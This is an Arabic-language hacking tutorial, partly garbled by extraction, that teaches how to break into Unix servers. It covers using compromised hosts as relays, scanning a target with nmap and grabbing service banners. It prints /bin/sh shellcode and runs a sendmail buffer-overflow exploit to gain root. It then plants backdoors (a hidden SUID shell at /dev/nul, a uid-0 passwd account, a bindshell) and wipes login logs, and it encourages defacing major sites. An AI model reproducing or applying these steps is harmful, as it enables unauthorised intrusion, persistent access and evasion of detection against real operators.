                          ‫6-طبعا .. معظم اادوات و اكواد االكسبلويتات مصممه للعمل في بيئه اليونيكس ..‬

                                                     ‫اوكي ... ما هي توزيعات اليونيكس ؟؟و اللينكس ؟؟‬
                                                         ‫بالنسبه لليونيكس .. فهو منقسم الي قسمين :‬
                                                                   ‫2- يونيكس تجاري .( غير مجاني )‬
                                                  ‫6- يونيكس مفتو ح المصدر و مجاني ‪open source‬‬

              ‫بالنسبه لليونيكس التجاري ال يمكن ان تركبه على جهازك العادي ..لذا فيمكنك تجاهله االن :)‬
                                                                    ‫اما المجاني فيوجد منه عده عائالت‬
                                                                                               ‫-‪BSD‬‬
 ‫و هي االقدم و االصعب في االستعمال .. و من االفضل لك اال تستعملها اال اذا كنت ترغب في تركيب سيرفير‬
                                                                                            ‫على الجهاز‬
                                                                                                    ‫...‬
                                                           ‫يوجد اللينكس ..و هو طبعا غني عن التعريف‬
   ‫طبعا .. يوجد منه العديد من التوزيعات و ان كان افضلها هي ‪ ( SuSe‬لم اجربها و لكن اسمع الكثير من‬
                                                                     ‫الناس يشكرون في هذه التوزيعه )‬
                 ‫اما بالنسبه السهل توزيه فهي ‪ MDK‬و قد و ضعت هنا بعض الدروس الخاصه بالمندريك‬
                                                                           ‫يمكنك تحميلها و قرائتها ..‬
                         ‫ان لم تجد مكانا تحصل منه على اللينكس يمكنك مراسلتي على ايميلي و نحدد مكانا‬
              ‫لتسليمك نسخه من الماندريك8 او الريد هات 6.1 ( ثمن االسطوانات البالنك و النسخ فقط )‬
‫على اي حال .. للينكس مميزات كثيره ..امن ... مستقر .. مجاني .. يمكنك تطويره ليالئم امكانيات جهازك ..‬

                                                                                           ‫- االنترنت‬
                               ‫.. ماذا ... تريد ان تخترق ..جميل جميل .. تريد ان تخترق جهازك ام ماذا ؟؟‬
                          ‫اه..تريد ان تخترق اجهزه مبحره في االنترنت ...اذن ..دعنا نبحر على االنترنت :)‬

                      ‫انا عارف انك حصلت على الدرس ده من االنترنت .. لكن هذا كان عن طريق الويندوز‬
                               ‫.. لكن انت اليوم انسان مختلف... انت انسان لينكسي .. ذه فلسفه محترمه ..‬


                                                  ‫452‬
  ‫اذن يجب ان تبحر الى االنترنت من نظام اليونيكس .. لن اساسا يجب ان تعرف المودم بتاعك على اللينكس‬
  ‫حسب التوزيعه اللي عندك .. حاول تعرف المودم .. حتالقي ان اللينكس لم يجد اي مودم موصل بالجهاز ؟؟‬
                                                                                ‫ما هذا .. ال تتعجب ..‬
                                    ‫فكل المودمات الداخليه ‪ internal‬يطلقون عليها ‪.. winmodems‬‬
              ‫لماذا النها مصممه اساسا للعمل تحت نظام التشغيل ‪ .. windows‬ارجوك ال تلوم اللينكس ..‬
                                                   ‫بل يجب ان تلوم صانع كروت الفاكس الداخليه هذه :)‬
          ‫اوكي ..اما بالنسبه للمودم الخارجي ‪ external‬فهو مودم حقيقي ‪real or true modems‬‬
                                   ‫... يوجد العديد من المودمز الخارجيه مثل ‪acorp , u.s. robotics‬‬
                                                   ‫يجب ان تتاكد ان المودم يكون ‪ serial‬و ليس ‪USB‬‬
                                                                    ‫على اي حال خلينا في موضوعنا...‬
                         ‫خالص .. ادخل على االنترنت من خالل ال ‪ isp‬وذلك من خالل نظام الليونيكس :)‬

     ‫اهم حاجه قبل الشروع في االختراق هي ان تحاول اال يتم االيقاع بك و كشف محاولتك الختراق سيريفير‬
                                                                                                    ‫معين ..‬
     ‫و طبعا هنك و سائل عديده لذلك لن اتطرق اليها الن هناك العديد من الشرو ح المتميزه في مجال الحمايه‬
                                                                                                ‫وازاله االثر‬
                                                                             ‫الخصهم في نقطتين او ثالثه :‬
   ‫2-ايك ان تحاول ان تسجل في موقع تحاول اختراقه .. و ال حتى باسامي مزوره الن هذا قد يجعلك عرضه‬
                                                                                 ‫لكشف االي بي الخاص بك‬
                                                         ‫و من ثم ال ‪ isp‬ثم رقم هاتفك و صبا ح الفل ...ت‬
                                       ‫6- اياك ان تتباهى باختراقاتك ابدا اما غير المهتمين بامور الهاك ...‬
 ‫3-احاول اال تخترق دائم من خالل جهازك ... ال ال .. انت فهمتني غلط .. مش قصدي يعني ترو ح لنت كافيه‬
                                                                                                          ‫:)‬
                                               ‫جهازك =====> الجهاز الضحيه ... ده مش مامون ..لكن‬
                       ‫جهازك======> جهاز وسيط======> السيرفير الضحيه ...ده كده كويس اوي‬
                     ‫طيب ايه الجهاز الوسيط ده.. ده ممكن يكون مثال جهاز مخترق من قبل او شيل اكاونت .‬
       ‫طيب ماهو الشيل اكاونت: هو عباره عن خدمه حيث يمكنك من خاللها التحكم في جهاز من بعيد و هذا‬
                                                                               ‫الجهاز عليه نظام اليونيكس‬
                ‫طبعا من غير ان تقوم باختراق هذا الجهاز ..و يوجد العديد ممن يقدمون هذا الحدمه مجانا ..‬
  ‫.- حاول ان ال تخترق اجهزه خطيره و مهمه مثل .‪ gov .mil‬او سيرفيرات اجب عليك قبل ان .‪ edu‬و‬
                                                                                      ‫غيرها من هذا النمط.‬
         ‫5- هذه النقطه تعتمد على بعض تقنيات الفريكينج .. لعمل اخفاء لرقم تليفونك عن مزود الخدمه لديك‬
                                                                                         ‫.‪REdirecting‬‬

                                                                       ‫-فحص المواقع ومنافذ ال ‪: TCP‬‬

          ‫يجب عليك قبل ان تقوم باالختراق ان تعرف كيف يمشي االنترنت .. انه يعتمد على بروتوكول يدعى‬
                                                                                             ‫‪TCP\IP‬‬
                                                                    ‫و بعض البروتوكوالت االخرى ....‬
                                                                    ‫طيب ... ركز معايا ابوس ايدك =‪D‬‬
      ‫المفروض ان كل جهاز على النت بيكون فيه بورتات مفتوحه ..هذا البورتات يمكنك ان تقوم من خاللها‬
                                                                                          ‫بارسال الداتا‬
‫من جهاز الى ذلك الجهاز ..هذه البورتات المفتوحه ( المفتوحه فقط ) تكون على استعدد دائما لتلقي الداتا من‬
                                                                                         ‫ريموت بوكس‬
                                      ‫دائما ما ترتبط البورتات المفتوحه بما يسمى بخدمه ..‪>> service‬‬
                       ‫و هذا الخدمه ‪ service‬تكون مستضافه من خالل ديمون ‪daemon or server‬‬
 ‫اذن .. الديمون هذا اذا قام صاحب الموقع بفتحه في السيرفير فانه يقوم بفتح منفذ في السيرفير ..لكي يقوم‬
                                                       ‫الديمون هذا من خالله بتقديم الخدمه الملعونه =‪D‬‬
                                    ‫و هذه بعض الخدمات مع البورتات الخاصه بهم ..لكن طبعا هناك كثيير‬



                                                   ‫552‬
                         ‫‪FTPd‬‬          ‫‪FTP‬‬                      ‫26‬
                         ‫‪telnetd‬‬    ‫‪Telnet‬‬                      ‫36‬
                ‫‪)!sendmail (yes‬‬      ‫‪SMTP‬‬                       ‫56‬
                       ‫‪apache‬‬        ‫‪HTTP‬‬                       ‫20‬
                         ‫‪qpop‬‬        ‫3‪POP‬‬                     ‫222‬
                        ‫حرف ‪ d‬في اخر كلمه ‪ ftp , telnet ..etc‬اختصار لكلمه ‪daemon‬‬

 ‫مثال : لو سيادتك قمت بزياره هذا العنوان من خالل المتصفح مثال‪ www.host.net‬ماالذي يحدث ؟؟‬
                             ‫يقوم المتصفح باالتصال بالموقع من خالل بورت ال ‪ TCP‬رقم 20‬
                                                                     ‫ثم يقوم بارسال االمر‬
                                ‫‪ GET /HTTP/1.1 /index.html‬واوامر اخرى كثيره ..‬
                ‫ثم بعد ذالك يقوم الموقع المطلوب بارسال كود الهتمل الخاص بالصفحه ‪index.html‬‬

 ‫الشيء الطريف ان ال ‪ daemons‬دي مليئه بالثغرات االمنيه الخطيره ...و هوه ده اللي احنا محتاجينه‬
                                                                                         ‫=>‬

‫اذن لكي تقوم باختراق موقع يجب ان تعرف اي ال ‪ daemons‬الموجوده عل السيرفير لذلك يجب عليك‬
                                                                                         ‫ان تعرف‬
               ‫ماهي المنافذ المفتوحه في السيرفير المستهدف ...اذن كيف تحصل عى المعلومات هذه ..‬
‫من خالل ما ال‪ ... port scaners‬السكانرز هي عباره عن برامج تحول ان تتصل بالسيرفير المستهدف‬
                                      ‫من خالل جميع المنافذ ..و ذلك لمعرفه اي البورتات المفتوحه‬
 ‫في هذا السيرفير ...اشهر هذا السكانرز هي االداه ‪ nmap‬بواسطه ‪ fyodor‬و لحسن الحظ يوجد نسخه‬
                                                         ‫منها خاصه بالويندوز و ..!! ايه ده ..؟؟‬
                                                    ‫احنا مش اتفقنا ننسى الويندوز ده خالص =<‬
                                 ‫‪/http://members.lycos.co.uk/linuxdude/e3sar‬‬
                         ‫طيب..بالنسبه للينكس يمكننا ان نحصل على نسخه ‪ nmap‬على هيئه ‪rpm‬‬
                                                                          ‫و لتركيبها اتبع التالي :‬
                                        ‫‪bash-2.03$ rpm -i nmap-2.53-1.i386.rpm‬‬

‫ثم نقوم بالتشغيل .. و ان شاء هللا سنحاول على مدار الدرس باستخدم الموقع ‪ target.edu‬كمثال لموقع‬
                                                                                  ‫مستهدف ..‬
                                                                                 ‫اتبع التالي :‬
                                                 ‫‪bash-2.03$ nmap -sS target.edu‬‬

                  ‫( ‪Starting nmap V. 2.53 by fyodor@insecure.org‬‬
                                                 ‫‪) /www.insecure.org/nmap‬‬
                      ‫‪:)Interesting ports on target.edu (xx.xx.xx.xx‬‬
        ‫( :‪The 1518 ports scanned but not shown below are in state‬‬
                                                                    ‫‪)closed‬‬
                                           ‫‪Port‬‬      ‫‪State‬‬   ‫‪Service‬‬
                                               ‫‪tcp open‬‬        ‫26/‪ftp‬‬
                                            ‫‪tcp open‬‬        ‫36/‪telnet‬‬
                                             ‫‪tcp open‬‬        ‫56/‪smtp‬‬
                                              ‫‪tcp open‬‬        ‫20/‪http‬‬
                                            ‫‪tcp open‬‬       ‫222/3‪pop‬‬


   ‫43 ‪Nmap run completed -- 1 IP address (1 host up) scanned in‬‬
                                                              ‫‪seconds‬‬



                                             ‫652‬
        ‫اذن لقد قام ال ‪ nmap‬بعمل فحص شامل على الموقع و قام بمعرفه المنافذ المفتوحه كم ترى!!‬
         ‫اذن يمكننا ان نعرف ايضا اي الخدمات و ال‪ daemons‬الموجوده في الموقع ‪target.edu‬‬
              ‫لكن يلزمنا اداه معينه لالتصال بالموقع من احد هذا المنافذ ..فكر معي ماهي هذه االداه؟؟؟‬
   ‫نعم انها التلنت .. اه .. صحيح ان التلنت هوه خدمه ..من خالل التلنت ديمون .. و لكنه ايضا عباره عن‬
‫برنامج بسيط ..يمكنك من خالله االتصال باي موقع بمنفذ معين من خالل ال ‪... TCP‬تعال نشوف مثال :‬

                                               ‫12 ‪bash-2.03$ telnet target.edu‬‬
                                                     ‫‪...Trying xx.xx.xx.xx‬‬
                                              ‫‪.Connected to target.edu‬‬
                                               ‫‪.']^' Escape character is‬‬
                          ‫266 ‪.target.edu FTP server (SunOS 5.6) ready‬‬
                                                                      ‫‪quit‬‬
                                                            ‫266 ‪.Goodbye‬‬
                                     ‫‪Connection closed by foreign host‬‬

                                                                                    ‫اهااااا‬
                                                    ‫دول دلونا على معلومات قيمه اوي اوي :)‬
                                                    ‫2- نظام التشغيل هناك هو 6.5 ‪SunOS‬‬
                   ‫6- ديمون االف تي بي هناك هو ال‪ standard‬اللي بييجي مع نظم السن ‪sunOS‬‬

                                                        ‫تعال نجرب بورت تاني نتصل بيه من التلنت :‬

                                      ‫52 ‪bash-2.03$ telnet target.edu‬‬
                                            ‫‪...Trying xx.xx.xx.xx‬‬
                                     ‫‪.Connected to target.edu‬‬
                                      ‫‪.']^' Escape character is‬‬
 ‫266 0002 ‪target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep‬‬
                                                             ‫0- 41:81:90‬
                                                       ‫22. (‪)EDT‬‬
                                                              ‫‪quit‬‬
                      ‫266 2.2.6 ‪target.edu closing connection‬‬
                          ‫‪.Connection closed by foreign host‬‬


           ‫ايضا استفدنا معلومات قيمه هي ان ديمون ‪ smtp‬هو ال ‪ sendmail‬و ان اصدار ه هو‬
                                                                                   ‫2.22.0/3.8.0‬
‫جميل حميل ..طيب لماذا نحتج الى هذا المعلومات ؟؟ الن االكسبلويت و الثغره الموجوده دائما تعتمد على‬
‫ال ‪ daemon‬الموجود و على نظام التشغيل ..لكن توجد مشكله وهي ان بعض المكعلومات قد يمكن ان‬
                                                                      ‫تكون مزوره او غير صحيحه‬
                                                                          ‫ازاي ؟؟؟تابع معايا كده :‬
                                                                                    ‫باالداه ‪nmap‬‬
                                                     ‫‪bash-2.03$ nmap -sS target.edu‬‬

                ‫( ‪Starting nmap V. 2.53 by fyodor@insecure.org‬‬
                                              ‫‪) /www.insecure.org/nmap‬‬
                    ‫‪:)Interesting ports on target.edu (xx.xx.xx.xx‬‬
      ‫( :‪The 1518 ports scanned but not shown below are in state‬‬
                                                                 ‫‪)closed‬‬
                                         ‫‪Port‬‬     ‫‪State‬‬    ‫‪Service‬‬


                                             ‫752‬
                                                          ‫‪tcp open‬‬    ‫26/‪ftp‬‬
                                                       ‫‪tcp open‬‬    ‫36/‪telnet‬‬
                                                        ‫‪tcp open‬‬    ‫56/‪smtp‬‬
                                                         ‫‪tcp open‬‬    ‫20/‪http‬‬
                                                       ‫‪tcp open‬‬    ‫222/3‪pop‬‬

    ‫‪TCP Sequence Prediction: Class=random positive increments‬‬
                      ‫‪)!Difficulty=937544 (Good luck‬‬
          ‫41.2.2 - 221.1.2 ‪Remote operating system guess: Linux‬‬

   ‫43 ‪Nmap run completed -- 1 IP address (1 host up) scanned in‬‬
                                                              ‫‪seconds‬‬

                                                                                    ‫يانهار اسود :|‬
                                              ‫نظام التشغيل اللي االده قامت بتخمينه هو لينكس !!!!!!‬
                                                    ‫مش كان ‪ !!!!!! sunOS‬اه يا و الد الكلب =@‬

  ‫بس احنا برده الزم نعرف توزيعه اللينكس الوجوده ..لكن نقدر نقول ان المعلومات اللي جمعناها كفايه و‬
                                                                                      ‫ممكن تمشي‬
‫طيب ..كده احنا قمن بعمل سكان على الموقع و لكن ممكن احد االدمينز لو عرف ان اننا قمنا بفحص موقعه‬
                             ‫... اعتقد نه حيكون زعالن منن و حنا مش عايزين االدمين يزعل مننا لذلك‬
       ‫استخدمنا االختيار -‪ Ss‬على اي حل فان عمل سكان لموقع يعتبر عمل شرعي ال مشاكل فيه =‪D‬‬
                                                                         ‫لمزيد من المعلومات راجع:‬
                                                                    ‫‪bash-2.03$ man nmap‬‬

                                                          ‫رفع ادواتك على شل اكونت ..‬
                       ‫(هذه الخطوه اذا كن عندك شيل اكاونت و مش عايز تخترق من جهازك )‬
                                                                         ‫اتبع التالي :‬
                                                                   ‫‪bash-2.03$ ls‬‬
                                                               ‫‪program.c‬‬
                                               ‫‪sh-2.03$ ftp shell.com‬‬
                                             ‫‪Connected to shell.com‬‬
                    ‫266 ‪.shell.com FTP server (SunOS 5.6) ready‬‬
                                                             ‫‪Name: luser‬‬
                                  ‫233 ‪.Password required for luser‬‬
                                                              ‫‪:Password‬‬
                                            ‫236 ‪.User luser logged in‬‬
                                                   ‫‪ftp> put program.c‬‬
                                   ‫226 ‪.PORT command successful‬‬
  ‫252 28975,81.352.24.402( ‪.)ASCII data connection for program.c‬‬
                                              ‫266 ‪.Transfer complete‬‬
                                                                 ‫‪ftp> quit‬‬
                                                           ‫266 ‪Goodbye‬‬

                                                                  ‫طبعا هذه الطريقه ن خالل ا‪ftp‬‬
 ‫و هي غير محببه النها تقوم بعمل ملفات اللوج لذلك يفضل لك ان تقوم بنسح سورس كود االكسبلويت و‬
                                                                      ‫لصقها في ملف في الشيل .‬
                                                                   ‫‪sh-2.03$ vi exploit.c‬‬
        ‫ثم انسخ الكود ثم افتح تيرمينال تاني و اتصل بالشيل و الصق الكود في ملف و سميه بامتداد.‪c‬‬
                                                ‫كده انت رفعت االكسبلويت بتاعتك للشيل اكاونت .‬


                                             ‫852‬
                                       ‫وكومبايل لالكسبلويت و بعدين اعملها رن على الهوست المستهدف‬
                                                  ‫‪sh-2.03$ gcc program.c -o program‬‬
                                                                       ‫‪sh-2.03$ ./program‬‬

        ‫ملحوظه : عيب اوي انك تاخد االمرين دول كقاعده مسلم بيها.. كل اكسبلود و له اوامره الخاصه في‬
                                                                    ‫الكومبايل و له طريقه في التشغيل‬
                                             ‫تظهر هذا الطريقه في التعليق البرمجي او في ال‪. usage‬‬

                                                                        ‫- استغالل الثغرات المختلفه :-‬
    ‫هذا اهم جزا في الموضوع .بمجرد ان تعرف ماهو نظام التشغيل عند الموقع المستهدف و ايضا الديمونز‬
                                                                                ‫الشغاله على السيرفير‬
                 ‫فيمكنك ان تذهب الى اي دتا بيز اللي بتقدم اكسبلويت ..و دي موجوده بكثره على االنترنت‬
                                                     ‫‪http://www.linux.com.cn/hack.co.za‬‬
                                   ‫مثال ده فيه كل حاجه ممكن تتخيله ..مقسمه الى ديمونات و نظم تشغيل‬
                                                                         ‫و لكن ..ماهي االكسبلويت ؟؟‬
                           ‫االكسبلويت عباره عن سورس كود عاده مكتوب فبلغه السي او البيرل المهم ان‬
                  ‫االكسبلويت دي تقوم باستغالل منطقه معينه في السيرفير ..في حاله ‪TARGET.EDU‬‬
                     ‫يمكننا ان نستخدم االكسبلويت الخاصه ب 0.11.8 ‪ sendmail‬او اي ديمون اخر‬
‫على فكره العيال ديما اسمعهم يقولوا ان السند ميل هو اكبر ديمون معرض لالختراق ..مش عارف ايه السند‬
                                                                                        ‫ميل اساسا ؟؟‬
                                                                  ‫طيب روو ح للدرس ده و نت تعرف :‬
                               ‫‪http://www.pharaonics.net/less/NEtworks/124.htm‬‬
 ‫فيه حاجه الزم تعرفها .ان لما تشغل اكسبلويت على سيرفير معين ..ايه الفوائد اللي جتعود عليك (غير طبعا‬
                                                                                     ‫اختراق الموقع )‬
                                                  ‫حتحصل على حاجتين اتنين ..اول حاجه شيل عادي ....‬
                                              ‫تاني حاجه و ده المهم بالنسبه لنا مايسمى بالرووت شيل ..‬
‫طبعا انت لو اخدت رووت شيل على السيرفير اذن فانت كده تمتلك كفه الصالحيات و ممكن تعمل كل اللي انت‬
                          ‫عايزه ..ممكن تستعمل الرووت شيل ده كجهاز و سيط زي ما قلت في اول الدرس‬

                                   ‫دتا بيز صغيره لالكسبلويتات هي : ‪www.securityfocus.com‬‬
                                                  ‫‪www.insecure.org/sploits.html‬‬

  ‫..طيب زي ما قلت ان كل اكسبلويت مختلفه عن االخرى و يجب عليك ان تقرا الكود بتاعها او التعليقات اذا‬
                                                                         ‫كنت ال تفهم في لغه البرمجه ..‬
    ‫من اسهل و اشهر االكسبلويتات هي البفر اوفر فلو ... يقوم هذه االكسبلويت بعمل ( دربكه في الديمون )‬
                                                                   ‫مم يؤدي الى تشغيل الكود الذي تريده‬
                           ‫يقوم هذا الكود بتشغيل شيل في السيرفير لذلك فهو يسمى شيل كود‪shell code‬‬
 ‫طبعا يختلف هذا الكود تبعا لنظام التشغيل .. لذلك يجب علينا ان نعرف نظم التشغيل المستخدم في السيرفير‬
                                                           ‫لو شوفنا كود اكسبلويت معينه ممكن نالقي ده‬
                                                                             ‫‪= ][char shellcode‬‬
‫"\‪xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b‬‬
                                                                                                     ‫"‬
                                                                                           ‫"\‬
         ‫‪"x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd‬‬
                                                  ‫"\‪;"x80\xe8\xdc\xff\xff\xff/bin/sh‬‬



                                   ‫اها..دهه للينكس و يقوم بتشغيل الشيل اللي في المسار دهه /‪bin/sh‬‬
                    ‫طبعا لو السيرفير بتاعك شغال على نظام تشغيل اخر اذن يجب عليك ان تغير الشيل كود‬


                                                ‫952‬
    ‫ده الى اخر يناسب النظام المستهدف ..طبعا ممكن تالقي شيل كودس لجميع نظم التشغيل في مواقع‬
                                                                           ‫السيكيورتي المختلفه.‬
                                                                                            ‫...‬
‫زي ما قلت يجب عليك البا انك متستعملش جهازك في االختراق .. و انما تستخدم جهازا وسيطا او شيل‬
                                                 ‫اكاونت ..طريقه لدخول الى الشيل اكاونت كالتالي‬
                                            ‫32 ‪bash-2.03$ telnet myshellaccount‬‬
                                                          ‫‪...Trying xx.xx.xx.xx‬‬
                                         ‫‪.Connected to yourshellaccount‬‬
                                                    ‫‪.']^' Escape character is‬‬
                                                ‫‪Welcome to yourshellaccount‬‬
                                                             ‫‪login: malicioususer‬‬
                                                ‫‪)Password: (it doesn't display‬‬
              ‫‪.>Last login: Fry Sep 15 11:45:34 from <yourIPaddress‬‬
                                                                            ‫30.2-‪sh‬‬

                                             ‫طيب لو عندنا اكسبلويت للسند ميل اسمها ‪exploit.c‬‬
                             ‫و هي تعمل بفر اوفر فلو .. يمكننا اوال عمل الكومبايل و تشغيله كتاللي:‬
                                            ‫‪sh-2.03$ gcc exploit.c -o exploit‬‬

                                                                  ‫‪sh-2.03$ ./exploit‬‬
                                           ‫‪This is a sendmail 8.9.11 exploit‬‬
                                                 ‫‪usage: ./exploit target port‬‬
                                                    ‫‪sh-2.03$./exploit 25 target.edu‬‬

                                                      ‫جميل جميل ...$معنها اننا اخدنا شيل هناك‬
                                                         ‫تعال نشوف وضعنا ايه على السيرفير :‬
                                                                                  ‫$‪whoami‬‬
                                                                                ‫‪root‬‬
                                                              ‫يا عيني ..كده انا بقيت رووت =)‬
         ‫طيب فيه العديد من االكسبلويتت مش بتخليك رووت على السيستم..و انما تديك بس شيل هنال‬
                                         ‫لذلك يجب عليك ن تقوم برفع اكسبلةيت اخر لوكل ‪local‬‬
   ‫للحصول على الرروت في النظام...تذكر ن تحاول ان تتجنب رفع االكسبلويتات باالف تي بي على قدر‬
                                                                   ‫المستطاع(احنا عايزينك =))‬
                       ‫فيه اكسبلويتات اخرى تعطيك صالحيه اظهار ملف الباسورد..اي تي سي =>‬

                                                                                 ‫-وضع باك دور :-‬
 ‫جميل .. اذن فقد اخذنا رووت على السيستم ..ماذا بعد ؟؟؟فعال انت في امكانك ان تقوم بتغير الموقع او‬
                                                                                  ‫الصفحه الرئيسيه‬
                            ‫كل ما عليك ان تبحث عن االندكس في اي مكان او باستخدام االمر فايند ..‬
‫لكن هذا بصراحه و من غير زعل ..ده شغل الالمرز الن عيب اوي انك تفرد عضالتك على موقع .‪edu‬‬
                                                       ‫فاغلب الهاكرز بامكانهم اختراق هذه الدومينات‬
                                     ‫و لكن انصحك جديا بتغيير الصفحه الرئيسيه في موقع محترم مثل‬
                                                           ‫‪microsoft.com , ibm.com etc‬‬
          ‫او المواقع السيئه المحتوى كاالباحيه او التي تسب الدين ... على اي حل مش موضوعنا دهه‬
                              ‫طيب احنا دلوقتي عايزين نحتفظ بالموقع دهه ..تذكر الثالث اجهزه اياهم‬
                                               ‫جهازك-----> جهاز وسيط------> الجهاز المستهدف .‬
                                                                           ‫اذن حنعمل ايه دلوقتي؟؟‬
‫في حاجه ..انت لو كتبت ‪ exit‬حتطلع بره السيرفير ده و تعود للشيل بتاعك و عشان ترجع تاني يلزمك‬
                                                                                     ‫نفس الخطوات‬



                                            ‫062‬
  ‫و في هذه الفتره قد يحتمل ان يكون االدمين قد قام بتغيير الباسورد او ركب باتش للديمون المصاب او قام‬
                                                                                     ‫بعمل اب جريد له‬
                                                    ‫مما يؤدي ان تفشل االكسبلويت في عملها ..و الحل ؟؟‬
 ‫بس احنا دلوقتي رووت و ممكن نعمل اللي في نفسنا ...اذن نركب باك دوور يسمح لنا بالعوده بعد ذلك في‬
                                                                                            ‫اي وقت ..‬
                            ‫احسن باك دور هوه الهاك اتاك ..صعب ان النورتون يكشفه و ممك...اه =| =|‬
                                                                          ‫ايه الكالم ده ياد يا ايسر ؟؟؟؟‬
                                                                                   ‫هاك اتاك =| !!!!!!‬
                                                                                    ‫اسف نسيت ... =)‬
                         ‫طبعا الباك دورز في موضوعي ده تختلف تماما عن الكالم الفاضي ده و ال مؤاخذه‬
‫طبعا الباك دورز دي عايزالها موضوع لواحده ان شاء احطه لكم قريبا .. لكن انا ساذكر لكم االساسيات فقط‬
                                                                                                      ‫..‬
                                                                           ‫2- ازاي تعمل ‪sushi‬؟؟؟؟‬
                           ‫لكي تقوم بعمل ‪ sushi‬او ‪ suid shell‬يلزمك ان تقوم بنسخ ال /‪bin/sh‬‬
                                            ‫الى مكان خفي و نقوم باعطاءه صالحيات ال ‪ suid‬كالتالي :‬
                                                                 ‫‪sh-2.03$ cp /bin/sh /dev/nul‬‬
                                                                                               ‫هههههه‬
 ‫في اغلب االحيان االدمين ال ينظر داخل الدايركتوري ‪ .. dev‬و لو حصل و نظر دخله فانه لن يشعر بشيء‬
                                                                   ‫غريب الن فيه ملف اساسا اسمه ‪null‬‬
                                                                    ‫=‪ D‬ال ده احنا عيال جدعان اوي =‪D‬‬

                                                                         ‫‪sh-2.03$ cd /dev‬‬
                                                            ‫‪sh-2.03$ chown root nul‬‬

                                                      ‫نعطي الشيل الصالحيات اللي احنا عايزينها :-‬
                                                                ‫‪sh-2.03$ chmod 4775 nul‬‬
                                                      ‫511. معناها ال ‪ suid‬اللي احنا عايزينها .‬
  ‫خلي بالك ان االمر ‪ chmod +s nul‬ممكن ميشتغلش في بعض االنظمه .. خليك مع االمر االول بيعمل‬
                                                                                         ‫في كله ..‬

                                                        ‫كده خلصنا مهمتنا ..تعالى نطلع بره كده و نشوف‬
                                                                                   ‫‪sh-2.03$ exit‬‬

                                              ‫بعد 20 يوم لو رجعنا =‪ D‬تعال نشوف كده اللي حيحصل :‬
                                                                          ‫‪sh-2.03$ whoami‬‬
                                                                                ‫‪luser‬‬
                                                                  ‫‪sh-2.03$ /dev/nul‬‬
                                                                  ‫‪sh-2.03$ whoami‬‬
                                                                                 ‫‪root‬‬

                                                      ‫احنا سوبر يوزرز االن بكل سهوله =)‬
  ‫فيه مشكله .. في كثير من الشيلز تمنع اعطاء صالحيات ال ‪ suid‬يعني مينفعش نحصل على ال ‪sushi‬‬
    ‫و في هذه الحاله يلزمنا ان نرفع للسيرفير المخترق شيل خاص تاني اسمه ‪ sash‬و هو اختصار ل ‪A‬‬
                                                                  ‫‪stand-alone shell‬‬
                                                                     ‫ذو اوامر خاصه به ...‬
                ‫و هو يسمح باعطاء صالحيات ال‪ suid‬ل /‪ bin/sh‬اذن نقدر نعمل االن ال ‪sushi‬‬

                                                         ‫6- كيف نضيف يوزرز مزورين ؟؟‬
‫طبعا انت رووت و تقدر تعمل تغيير في الملف /‪ etc/passwd‬و ممكن من خالل الملف ده انك تضيف اي‬
                                                                            ‫حد انت عايزه‬


                                                 ‫162‬
                                                                            ‫باستعمال المحرر ‪-: vi‬‬
                                                                  ‫‪sh-2.03$ vi /etc/passwd‬‬
                                              ‫طبعا الزم يكون عندك فكره عن كيفيه استخدام المحرر ‪vi‬‬
                                         ‫في الملف ده حتالقي سطر لكل يوزر عادي يكون على الشكل ده‬
                                                   ‫‪luser:passwd:uid:gid:startdir:shell‬‬

                                                      ‫في حاله السوبر يوزرز بيكون ال 0= ‪uid & gid‬‬
                                                                               ‫اذن اضف السطر ده :‬
                                                                  ‫‪dood::0:0:dood:/:/bin/sh‬‬
                                                                ‫و كده اانت ضفت سوبر يوزر للنظام‬
                                                                           ‫‪sh-2.03$ su dood‬‬
                                                                   ‫‪sh-2.03$ whoami‬‬
                                                                                    ‫‪dood‬‬

                       ‫طبعا احنا رووت ..ليه الن االخ ‪ dood‬كل من ال ‪ gid‬و ال ‪ uid‬يساوي صفر‬

                                                                    ‫3- كيف تضع ‪ bindshell‬؟‬
‫‪ bindshell‬عباره عن ديمون شبيه جد بال ‪ telnetd‬في الحقيقه التلنت ديمون عباره عن بايند شيل ..‬


                  ‫البايند شيل هذا يقوم بفتح بورت او منفذ يعني و لكنه ليس منفذ ‪ TCP‬بل منفذ ‪UDP‬‬
                                                    ‫و طبعا بيعطيك شيل عند االتصال بهذا البورت ..‬
‫الطريف و الشيق في الموضوع انه االدمين لما ييجي يعمل سكان على الجهاز بتاعه للتامين عاده و في اغلب‬
                                                                               ‫االحيان السكن يكون‬
                            ‫على منافذ ال ‪ TCP‬و نادرا جدا ان يعمل سكان على منافذ بروتوكول ‪UDP‬‬

                                                                             ‫- عمليه ازاله االثار :-‬
  ‫في نظاام اليونيكس ..عندما تقوم بالدخول الى حسابك .. فنكا ترى رساله عند اول الدخول تعلمك باخر مره‬
                                                   ‫قمت بها بالدخول و رقم االي بي الذي دخلت منه ..‬
                         ‫يعني سيادتك لو دخلت باسم يوزر و بعد كده اليوزر ده دخل حيالقي الرساله دي‬

                        ‫‪.>Last login: Sun Sep 24 10:32:14 from <yourIPaddress‬‬
                                                                          ‫و طبعا سيادتك كده حتتكشف‬
                            ‫الن اليوزر ده لو كان ناصح حيبعت ايميل لالدمين و يقوله و يبلغه باللي حصل‬
                                                      ‫و طبع االدمين في الحال حيبعتله رساله و يقوله :-‬
            ‫متخافش يا واد ده واحد دخل على الحساب بتاعك و االي بي بتاعه موجوود .. و ن ان شاء هللا‬
                     ‫حاتصل بمزود الخدمه في المنطقه و اساله عن رقم التلفون و ان شاء ابلغ البوليس ..‬
                                                                                   ‫و بالهنا و الشفا =)‬

                                                                ‫المعلومات دي موجوده في المناطق دي‬

                                                                               ‫/‪usr/adm/lastlog‬‬
                                                                               ‫/‪var/adm/lastlog‬‬
                                                                                ‫/‪var/log/lastlog‬‬

                                 ‫يمكنك مسحهم باستخدام ‪ lled‬و دي ممكن تالقيها في اي موقع مهتم ..‬
                                         ‫بيكون معاه ملف للمساعده اقراه لكي تعرف طريقه االستخدام ...‬
                        ‫في حاله استخدام ‪ ftp‬لرفع االدوات يتخلف عن ذلك معلومات ايضا يمكنك ازالتها‬
                                                      ‫باستخدام ‪ wted‬و هو شبيه باالده السابقه ‪lled‬‬
